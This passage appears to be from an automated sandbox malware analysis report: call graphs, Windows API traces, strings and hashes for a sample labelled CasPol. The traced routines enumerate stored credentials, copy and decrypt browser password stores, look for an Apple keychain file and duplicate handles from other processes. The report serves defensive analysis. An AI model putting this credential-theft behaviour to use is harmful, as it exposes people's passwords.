API calls 38192->38198 38199 425287 38192->38199 38235 4384e9 135 API calls 38192->38235 38236 424f74 124 API calls 38192->38236 38193 415c7d 16 API calls 38193->38190 38195->38199 38237 424ff0 13 API calls 38195->38237 38198->38192 38199->38193 38200 425266 38200->38199 38238 415be9 memcpy 38200->38238 38202->37881 38203->37887 38204->37887 38205->37887 38206->37887 38207->37887 38208->37892 38209->37874 38211 4442eb 38210->38211 38214 444303 38210->38214 38291 41707a 11 API calls 38211->38291 38213 4442f2 38213->38214 38292 4446ea 11 API calls 38213->38292 38214->37880 38216 444300 38216->37880 38217->37890 38218->37899 38220 424f1f 38219->38220 38221 424f0c 38219->38221 38240 424eea 11 API calls 38220->38240 38239 416760 11 API calls 38221->38239 38224 424f18 38224->38186 38225 424f24 38225->38186 38226->38190 38228 425108 38227->38228 38234 42510d 38227->38234 38273 424f74 124 API calls 38228->38273 38231 42516e 38233 415c7d 16 API calls 38231->38233 38232 425115 38232->38192 38233->38232 38234->38232 38241 42569b 38234->38241 38235->38192 38236->38192 38237->38200 38238->38199 38239->38224 38240->38225 38251 4256f1 38241->38251 38269 4259c2 38241->38269 38246 4260dd 38285 424251 120 API calls 38246->38285 38250 429a4d 38253 429a66 38250->38253 38254 429a9b 38250->38254 38251->38250 38252 422aeb memset memcpy memcpy 38251->38252 38256 4260a1 38251->38256 38265 4259da 38251->38265 38267 429ac1 38251->38267 38251->38269 38272 425a38 38251->38272 38274 4227f0 memset memcpy 38251->38274 38275 422b84 15 API calls 38251->38275 38276 422b5d memset memcpy memcpy 38251->38276 38277 422640 13 API calls 38251->38277 38279 4241fc 11 API calls 38251->38279 38280 42413a 90 API calls 38251->38280 38252->38251 38286 415c56 11 API calls 38253->38286 38258 429a96 38254->38258 38288 416760 11 API calls 38254->38288 38283 415c56 11 API calls 38256->38283 38289 424251 120 API calls 38258->38289 38261 429a7a 38287 416760 11 API calls 38261->38287 38284 416760 11 API calls 38265->38284 38268 425ad6 38267->38268 38290 415c56 11 API calls 38267->38290 38268->38231 38269->38268 38278 415c56 11 API calls 38269->38278 38272->38269 38281 422640 13 API calls 38272->38281 38282 4226e0 12 API calls 38272->38282 38273->38234 38274->38251 38275->38251 38276->38251 38277->38251 38278->38265 38279->38251 38280->38251 38281->38272 38282->38272 38283->38265 38284->38246 38285->38268 38286->38261 38287->38258 38288->38258 38289->38267 38290->38265 38291->38213 38292->38216 38293->37903 40162 4147f3 40165 414561 40162->40165 40164 414813 40166 41456d 40165->40166 40167 41457f GetPrivateProfileIntW 40165->40167 40170 4143f1 memset _itow WritePrivateProfileStringW 40166->40170 40167->40164 40169 41457a 40169->40164 40170->40169

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 361 40de6e-40de71 359->361 361->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 381 40df23-40df4a GetCurrentProcess DuplicateHandle 379->381 380->378 382 40dfd1-40dfd3 380->382 381->380 383 40df4c-40df76 memset call 41352f 381->383 382->377 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                              • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                                • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                              • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                              • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                              • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                              • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                                                              • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                                                              • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                                                              • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                                                              • memset.MSVCRT ref: 0040DF5F
                                                                                                                                                              • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                                                                              • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                                                              • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                                                                              • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                                                              • API String ID: 708747863-3398334509
                                                                                                                                                              • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                              • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                                                              • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                              • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                                                                • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                              • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                                                              • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                                                              • free.MSVCRT ref: 00418803
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1355100292-0
                                                                                                                                                              • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                              • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                                                              • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                              • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                                                              APIs
                                                                                                                                                              • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                                                              • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileFind$FirstNext
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1690352074-0
                                                                                                                                                              • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                              • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                                                              • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                              • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0041898C
                                                                                                                                                              • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InfoSystemmemset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3558857096-0
                                                                                                                                                              • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                              • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                                              • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                              • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 43 44558e-445594 call 444b06 4->43 44 44557e-44558c call 4136c0 call 41366b 4->44 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 46 445823-445826 14->46 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 58 445879-44587c 18->58 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 77 445685 21->77 78 4456b2-4456b5 call 40b1ab 21->78 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 140 44592d-445945 call 40b6ef 24->140 141 44594a 24->141 38 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->38 39 445b29-445b32 28->39 145 4459d0-4459e8 call 40b6ef 29->145 146 4459ed 29->146 30->21 42 445609-44560d 30->42 31->30 182 445b08-445b15 call 40ae51 38->182 47 445c7c-445c85 39->47 48 445b38-445b96 memset * 3 39->48 42->21 56 44560f-445641 call 4087b3 call 40a889 call 4454bf 42->56 43->3 44->43 49 44584c-445854 call 40b1ab 46->49 50 445828 46->50 70 445d1c-445d25 47->70 71 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 47->71 63 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 48->63 64 445b98-445ba0 48->64 49->13 65 44582e-445847 call 40a9b5 call 4087b3 50->65 156 445665-445670 call 40b1ab 56->156 157 445643-445663 call 40a9b5 call 4087b3 56->157 61 4458a2-4458aa call 40b1ab 58->61 62 44587e 58->62 61->19 75 445884-44589d call 40a9b5 call 4087b3 62->75 249 445c77 63->249 64->63 76 445ba2-445bcf call 4099c6 call 445403 call 445389 64->76 143 445849 65->143 82 445fae-445fb2 70->82 83 445d2b-445d3b 70->83 160 445cf5 71->160 161 445cfc-445d03 71->161 148 44589f 75->148 76->47 93 44568b-4456a4 call 40a9b5 call 4087b3 77->93 109 4456ba-4456c4 78->109 98 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 83->98 99 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 83->99 150 4456a9-4456b0 93->150 166 445d67-445d6c 98->166 167 445d71-445d83 call 445093 98->167 196 445e17 99->196 197 445e1e-445e25 99->197 122 4457f9 109->122 123 4456ca-4456d3 call 413cfa call 413d4c 109->123 122->6 174 4456d8-4456f7 call 40b2cc call 413fa6 123->174 140->141 141->23 143->49 145->146 146->28 148->61 150->78 150->93 156->109 157->156 160->161 171 445d05-445d13 161->171 172 445d17 161->172 176 445fa1-445fa9 call 40b6ef 166->176 167->82 171->172 172->70 207 4456fd-445796 memset * 4 call 409c70 * 3 174->207 208 4457ea-4457f7 call 413d29 174->208 176->82 202 445b17-445b27 call 40aebe 182->202 203 445aa3-445ab0 call 40add4 182->203 196->197 198 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->198 199 445e6b-445e7e call 445093 197->199 239 445e62-445e69 198->239 240 445e5b 198->240 220 445f67-445f99 call 40b2cc call 409d1f call 409b98 199->220 202->39 203->182 221 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 203->221 207->208 248 445798-4457ca call 40b2cc call 409d1f call 409b98 207->248 208->10 220->82 253 445f9b 220->253 221->182 239->199 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 265 445f4d-445f5a call 40ae51 245->265 248->208 264 4457cc-4457e5 call 4087b3 248->264 249->47 253->176 264->208 269 445ef7-445f04 call 40add4 265->269 270 445f5c-445f62 call 40aebe 265->270 269->265 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->220 274->265 281 445f3a-445f48 call 445093 274->281 281->265
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 004455C2
                                                                                                                                                              • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                              • memset.MSVCRT ref: 0044570D
                                                                                                                                                              • memset.MSVCRT ref: 00445725
                                                                                                                                                                • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                                • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                                                • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                                • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                              • memset.MSVCRT ref: 0044573D
                                                                                                                                                              • memset.MSVCRT ref: 00445755
                                                                                                                                                              • memset.MSVCRT ref: 004458CB
                                                                                                                                                              • memset.MSVCRT ref: 004458E3
                                                                                                                                                              • memset.MSVCRT ref: 0044596E
                                                                                                                                                              • memset.MSVCRT ref: 00445A10
                                                                                                                                                              • memset.MSVCRT ref: 00445A28
                                                                                                                                                              • memset.MSVCRT ref: 00445AC6
                                                                                                                                                                • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                                                                • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                                                • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                              • memset.MSVCRT ref: 00445B52
                                                                                                                                                              • memset.MSVCRT ref: 00445B6A
                                                                                                                                                              • memset.MSVCRT ref: 00445C9B
                                                                                                                                                              • memset.MSVCRT ref: 00445CB3
                                                                                                                                                              • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                                              • memset.MSVCRT ref: 00445B82
                                                                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                                                • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                                              • memset.MSVCRT ref: 00445986
                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                                                              • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                              • API String ID: 2263259095-3798722523
                                                                                                                                                              • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                                              • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                                              • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                                              • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                              • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                                                              • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                                              • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                              • API String ID: 2744995895-28296030
                                                                                                                                                              • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                              • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                                              • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                              • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0040B71C
                                                                                                                                                                • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                                                • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                                              • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                              • memset.MSVCRT ref: 0040B756
                                                                                                                                                              • memset.MSVCRT ref: 0040B7F5
                                                                                                                                                              • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                              • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                                                                                              • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                                                                              • memset.MSVCRT ref: 0040B851
                                                                                                                                                              • memset.MSVCRT ref: 0040B8CA
                                                                                                                                                              • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                                                                                                • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                                                                              • memset.MSVCRT ref: 0040BB53
                                                                                                                                                              • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                                                              • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateDeleteHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                                                                                                                              • String ID: chp$v10
                                                                                                                                                              • API String ID: 4165125987-2783969131
                                                                                                                                                              • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                                                                                              • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                                                              • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                                                                                              • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 504 4091b8-40921b memset call 40a6e6 call 444432 509 409520-409526 504->509 510 409221-40923b call 40b273 call 438552 504->510 514 409240-409248 510->514 515 409383-4093ab call 40b273 call 438552 514->515 516 40924e-409258 call 4251c4 514->516 528 4093b1 515->528 529 4094ff-40950b call 443d90 515->529 521 40937b-40937e call 424f26 516->521 522 40925e-409291 call 4253cf * 2 call 4253af * 2 516->522 521->515 522->521 552 409297-409299 522->552 532 4093d3-4093dd call 4251c4 528->532 529->509 538 40950d-409511 529->538 539 4093b3-4093cc call 4253cf * 2 532->539 540 4093df 532->540 538->509 542 409513-40951d call 408f2f 538->542 539->532 555 4093ce-4093d1 539->555 543 4094f7-4094fa call 424f26 540->543 542->509 543->529 552->521 554 40929f-4092a3 552->554 554->521 556 4092a9-4092ba 554->556 555->532 557 4093e4-4093fb call 4253af * 2 555->557 558 4092bc 556->558 559 4092be-4092e3 memcpy memcmp 556->559 557->543 569 409401-409403 557->569 558->559 560 409333-409345 memcmp 559->560 561 4092e5-4092ec 559->561 560->521 564 409347-40935f memcpy 560->564 561->521 563 4092f2-409331 memcpy * 2 561->563 566 409363-409378 memcpy 563->566 564->566 566->521 569->543 570 409409-40941b memcmp 569->570 570->543 571 409421-409433 memcmp 570->571 572 4094a4-4094b6 memcmp 571->572 573 409435-40943c 571->573 572->543 575 4094b8-4094ed memcpy * 2 572->575 573->543 574 409442-4094a2 memcpy * 3 573->574 576 4094f4 574->576 575->576 576->543
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 004091E2
                                                                                                                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                              • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                                              • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                                                              • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                                                                              • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                                                              • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
